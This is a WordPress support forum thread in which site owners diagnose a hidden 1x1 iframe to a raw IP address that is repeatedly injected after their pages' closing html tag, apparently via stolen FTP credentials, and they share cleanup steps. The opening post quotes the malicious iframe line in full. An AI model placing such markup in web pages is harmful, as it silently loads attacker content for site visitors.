Support » Fixing WordPress » iframe tag after html close

  • Hi I have just moved up to version 2.9.1 and I have noticed a problem with my site.

    I am getting an extra line added at the end of the code

    </html><iframe src=”http://91.201.28.6/goods/index.php” width=”1″ height=”1″ frameborder=”0″></iframe>

    which is fine in Explorer but in firefox it makes my page jump to the bottom.

    I don’t like the look of the good and searching through my sources I can’t seem to find it or anything close.

    I have tried suspending plugins and then switch themes but it still appeared. Now I am a bit stumped and concerned.

    I had to update the database to move to 2.9.1. Can I reverse the release out or no I need to find how the code is made?

Viewing 10 replies - 1 through 10 (of 10 total)
  • Mmm I have noticed it is happening with a 2.8 installation too.

    I am wondering if I have a virus somewhere. I have tried it on different machines and in different browsers. How can extra code get added?

    Jon,

    same here. Check out every index.php file in your folders and remove the line. I had to remove the lines from 5 files (/, /plugins/index.php, /wp-content/index.php and /wp-content/themes/*/index.php & /footer.php

    I had it since 2 days and it MUST be some WP plugin because I didn’t do anything but upgrading some plugins. Maybe some statistic tracker? I have no idea and I’m too scared to find out 😉

    Hope that helps!

    PS: Better change your FTP password ASAP after removing all lines I think 🙁

    … and it didn’t help. After an hour the spam thing was back again in every single file.

    I have done text level searches of all the code for “iframe” and nothing looked wrong.
    The index.php etc all are free off this code.
    Does anyone know where I can find a list of what is called when? Or know what sources I need to check for routines that are called after the last </html>?
    Is it possible for something outside of wordpress to tag an extra line on?
    I did wonder if it was google analytics or something but I don’t see how it can be.

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    is probably a good place to start…no plugins I use, or analytics, or anything like that adds in an iframe…..nor does WP itself…so it looks more and more like a hack

    There’s many ways for code to be inserted into your source….from rogue files stuck on your server, stuff in your DB, etc.

    Found any solution, Jon? Here the iframe tag comes back after 24 hours. Now Google even warns customers:

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://91.201.28.6/goods/index.php&client=chromium&hl=en-US

    Hi Folks

    I had the same problem and discovered that it is actually a trojgen that sits on your computer that you use to access your ftp. What it does is get the ftp passwords of any hosting accounts that you upload to from that computer. It then (or some one at the other end) adds that <iframe> tag.

    To fix this…
    – Update your virus scanner and scan your machine
    – Change all your ftp passwords
    – Up date to the latest cgi script (wordpress / joomla/etc)
    – Go through all the index files in each site you ftp and remove the tag

    An update to the last post…

    make sure you check all index files (there could be over 100 depending on your sites plugins and functionality) as it affects them all

    Helped. Thanks a lot, Jon!

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘iframe tag after html close’ is closed to new replies.